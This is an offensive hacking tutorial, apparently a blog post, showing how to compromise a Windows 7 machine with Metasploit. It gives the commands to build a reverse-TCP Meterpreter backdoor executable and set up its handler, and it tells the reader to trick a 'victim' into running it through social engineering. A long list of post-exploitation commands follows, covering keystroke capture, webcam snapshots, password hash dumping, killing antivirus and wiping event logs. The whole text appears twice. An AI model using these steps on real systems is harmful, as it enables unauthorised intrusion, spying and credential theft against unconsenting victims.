Using Metasploit to Hack a Windows 7 machine + Meterpreter Commands
This tutorial is only for EDUCATIONAL purpose
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
(After the TEXT format there is the video of this tutorial, and after video there is meterpreter commands)
Requirements:
1.Kali Linux/Backtrack
2.Metasploit Framework
Steps:
1.Open Terminal and type " service postgresql start && service metasploit start " (without quotation)
2.Now we need to create a payload for the machine
command for creating a payload
' msfpayload windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444 x > /root/backdoor.exe '
okay here after LHOST=enter your ip (to get your ip open terminal and type ifconfig and get the ip )
3.Use your social engineering skill to run the payload in the victim machine.
4.After you are successfully complete step 3
5.Open the terminal and type " service postgresql start && service metasploit start " (without quotation)
6.And type ' msfconsole '
and then type the following
use exploit/multi/handler (press enter)
set payload windows/meterpreter/reverse_tcp (press enter)
set lhost (the ip you provided while creating the payload) (press enter)
set lport 4444 (press enter)
exploit
Once you successfully compromised it will be like the following
Video:
Meterpreter Commands:
1. sysinfo -----> shows the system build x86 or x64, language version, build...etc
2. run checkvm ------> checks to see if the victim is running a Virtual Machine or native.
3. route --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc
4. run get_application_list -------> This shows you applications installed on the remotye PC
5. uictl ---------> Control Some of the User Interface Components
6. idletime -----> shows how long the victim has not been active on the computer.
7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.
8. getuid -------> This will show you the system identity and show you who you are running as such as system.
9. ps ------> This shows all the processes running on the victim as well as the PID's
10. run get_env -------> This willl give you a lot of info on the system
11. ifconfig and ipconfig -----> Find out the IPaddress and see how many adapters are enabled.
12. ? ------> Shows a list of different commands.
13. getsystem -----> attempts give you local system privelages
14. reboot ------> Reboot the remote machine
15. sc config process_name start= disabled --------> stops a process from starting on next system reboot "process_name" is the name of the proces you want to disable.
16. clearev -------> Wipes all event logs.
17. execute -f cmd.exe -H -c ------> Open a command prompt on a hidden channel.
18. interact 1 ------> interact with a channel "1" will be replaced with the chgannel you want to interact with.
19. download -------> This command will download the specified command. "Example" download c:\\boot.ini
20. upload --------> upload files to the victim machine
21. portfwd ------> forward a local port to a remote service
22. run getgui -e ------> this will enable remote desktop on the victim.
23. run gettelnet –e -------> To enable telnet on remote machine.
24. run getcountermeasure ------> checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc
25. run killav -------> it is designed to kill most AVs that are running as a service on the exploited machine. Works on sum but not all AV's.
26. run get_local_subnets ------> used to get the local subnet of the victim machine.
27. run hostedit -------> allows the attacker to add entries to the Windows host file. As a result of Windows checking the hosts file first, we can divert traffic to a fake entry
28. run remotewinenum -------> designed to enumerate the target system with the wmic command
30. run winenum -------> used for system enumeration. It will dump tokens, hashes, and issue both net and wmic commands
31. run scraper --------> used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”
32. migrate --------> Migrate to Another Process such as explorer.exe so you don't loose your session.
33. cat -------> Read the Contents of a File to the Screen
34. background "or ctrl + z" --------> Background the Current Session
35. irb -------> Drop into irb Scripting Mode
36. interact --------> Interact with a Channel
37. load ------> Load One or More Meterpreter Extensions.
38. channel -------> Displays Info About Active Channels
39. bgkill ---------> Kill a Background Meterpreter Script
40. close --------> Close a Channel
41. enumdesktops --------> List All Accessible Desktops and Window Stations
42. getdesktop -------> Get the Current Meterpreter Desktop
43. lpwd --------> Print Local Working Directory
44. ls --------> list Files
45. rm --------> Delete the Specified File
46. search --------> Search for Files.
47. upload ------> Upload File to Target
48. keyscan_start --------> Start Capturing Keystrokes
49. keyscan_stop Stop Capturing Keystrokes
49. keyscan_dump --------> Dump the Keystroke Buffer
50. screenshot --------> Screenshot of the GUI
51. setdesktop ---------> Change the Meterpreters Current Desktop.
52. getprivs ---------> Attempt to Enable All Privileges Available to the Current Process
53. kill --------> Terminate a Process "Example" kill 1834
54. reboot --------> Reboots the Remote Computer
55. reg ---------> Interact with the Remote Registry.
56. rev2self ---------> Calls RevertToSelf() on the Remote Machine
57. shell --------> Drop into a system shell.
58. shutdown --------> Shuts Down the Remote Computer
59. steal_token ------> Attempt to Steal an Impersonation Token from the Process
60. webcam_list --------> List webcams
61. webcam_snap -------> Take a snapshot from the specified webcam.
62. hashdump --------> Dumps the content of the SAM Database.
63. timestomp -------> Manipulates MACE Attributes
64. execute ------> Execute a command.
65. info --------> Display info about active post module.
66. quit --------> Terminate the meterpreter session.
67. getwd -------> Print Working Directory
68. mkdir -------> make directory.
69. pwd -------> print working directory.
70. drop_token -------> Relinquishes Any Active Impersonation Token
71. rmdir --------> remove directory.
72. del -------> delete file "exmple" del passwords.txt
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
(After the TEXT format there is the video of this tutorial, and after video there is meterpreter commands)
Requirements:
1.Kali Linux/Backtrack
2.Metasploit Framework
Steps:
1.Open Terminal and type " service postgresql start && service metasploit start " (without quotation)
2.Now we need to create a payload for the machine
command for creating a payload
' msfpayload windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444 x > /root/backdoor.exe '
okay here after LHOST=enter your ip (to get your ip open terminal and type ifconfig and get the ip )
3.Use your social engineering skill to run the payload in the victim machine.
4.After you are successfully complete step 3
5.Open the terminal and type " service postgresql start && service metasploit start " (without quotation)
6.And type ' msfconsole '
and then type the following
use exploit/multi/handler (press enter)
set payload windows/meterpreter/reverse_tcp (press enter)
set lhost (the ip you provided while creating the payload) (press enter)
set lport 4444 (press enter)
exploit
Once you successfully compromised it will be like the following
Video:
Meterpreter Commands:
1. sysinfo -----> shows the system build x86 or x64, language version, build...etc
2. run checkvm ------> checks to see if the victim is running a Virtual Machine or native.
3. route --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc
4. run get_application_list -------> This shows you applications installed on the remotye PC
5. uictl ---------> Control Some of the User Interface Components
6. idletime -----> shows how long the victim has not been active on the computer.
7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.
8. getuid -------> This will show you the system identity and show you who you are running as such as system.
9. ps ------> This shows all the processes running on the victim as well as the PID's
10. run get_env -------> This willl give you a lot of info on the system
11. ifconfig and ipconfig -----> Find out the IPaddress and see how many adapters are enabled.
12. ? ------> Shows a list of different commands.
13. getsystem -----> attempts give you local system privelages
14. reboot ------> Reboot the remote machine
15. sc config process_name start= disabled --------> stops a process from starting on next system reboot "process_name" is the name of the proces you want to disable.
16. clearev -------> Wipes all event logs.
17. execute -f cmd.exe -H -c ------> Open a command prompt on a hidden channel.
18. interact 1 ------> interact with a channel "1" will be replaced with the chgannel you want to interact with.
19. download -------> This command will download the specified command. "Example" download c:\\boot.ini
20. upload --------> upload files to the victim machine
21. portfwd ------> forward a local port to a remote service
22. run getgui -e ------> this will enable remote desktop on the victim.
23. run gettelnet –e -------> To enable telnet on remote machine.
24. run getcountermeasure ------> checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc
25. run killav -------> it is designed to kill most AVs that are running as a service on the exploited machine. Works on sum but not all AV's.
26. run get_local_subnets ------> used to get the local subnet of the victim machine.
27. run hostedit -------> allows the attacker to add entries to the Windows host file. As a result of Windows checking the hosts file first, we can divert traffic to a fake entry
28. run remotewinenum -------> designed to enumerate the target system with the wmic command
30. run winenum -------> used for system enumeration. It will dump tokens, hashes, and issue both net and wmic commands
31. run scraper --------> used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”
32. migrate --------> Migrate to Another Process such as explorer.exe so you don't loose your session.
33. cat -------> Read the Contents of a File to the Screen
34. background "or ctrl + z" --------> Background the Current Session
35. irb -------> Drop into irb Scripting Mode
36. interact --------> Interact with a Channel
37. load ------> Load One or More Meterpreter Extensions.
38. channel -------> Displays Info About Active Channels
39. bgkill ---------> Kill a Background Meterpreter Script
40. close --------> Close a Channel
41. enumdesktops --------> List All Accessible Desktops and Window Stations
42. getdesktop -------> Get the Current Meterpreter Desktop
43. lpwd --------> Print Local Working Directory
44. ls --------> list Files
45. rm --------> Delete the Specified File
46. search --------> Search for Files.
47. upload ------> Upload File to Target
48. keyscan_start --------> Start Capturing Keystrokes
49. keyscan_stop Stop Capturing Keystrokes
49. keyscan_dump --------> Dump the Keystroke Buffer
50. screenshot --------> Screenshot of the GUI
51. setdesktop ---------> Change the Meterpreters Current Desktop.
52. getprivs ---------> Attempt to Enable All Privileges Available to the Current Process
53. kill --------> Terminate a Process "Example" kill 1834
54. reboot --------> Reboots the Remote Computer
55. reg ---------> Interact with the Remote Registry.
56. rev2self ---------> Calls RevertToSelf() on the Remote Machine
57. shell --------> Drop into a system shell.
58. shutdown --------> Shuts Down the Remote Computer
59. steal_token ------> Attempt to Steal an Impersonation Token from the Process
60. webcam_list --------> List webcams
61. webcam_snap -------> Take a snapshot from the specified webcam.
62. hashdump --------> Dumps the content of the SAM Database.
63. timestomp -------> Manipulates MACE Attributes
64. execute ------> Execute a command.
65. info --------> Display info about active post module.
66. quit --------> Terminate the meterpreter session.
67. getwd -------> Print Working Directory
68. mkdir -------> make directory.
69. pwd -------> print working directory.
70. drop_token -------> Relinquishes Any Active Impersonation Token
71. rmdir --------> remove directory.
72. del -------> delete file "exmple" del passwords.txt